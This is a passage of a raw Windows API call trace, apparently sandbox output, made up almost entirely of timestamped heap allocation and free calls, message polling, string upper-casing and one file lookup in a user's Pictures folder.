Size=0x10) returned 0x2aaa660 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0212.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.080] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0212.080] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.080] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0212.081] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0212.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0212.081] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.081] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.081] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0212.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0212.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0212.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0212.082] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.082] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.083] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.083] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.084] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0212.084] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.084] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0212.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0212.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0212.085] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0212.085] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.085] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/yyplXweR.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1d89dd0, ftCreationTime.dwHighDateTime=0x1d5ca9c, ftLastAccessTime.dwLowDateTime=0xd6529ab0, ftLastAccessTime.dwHighDateTime=0x1d5d7c3, ftLastWriteTime.dwLowDateTime=0xd6529ab0, ftLastWriteTime.dwHighDateTime=0x1d5d7c3, nFileSizeHigh=0x0, nFileSizeLow=0xe4ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="yyplXweR.gif", cAlternateFileName="")) returned 0x9e1db8 [0212.086] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0212.086] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.087] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.087] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0212.087] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.087] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.087] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.087] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0212.087] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.088] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.088] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0212.088] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.088] 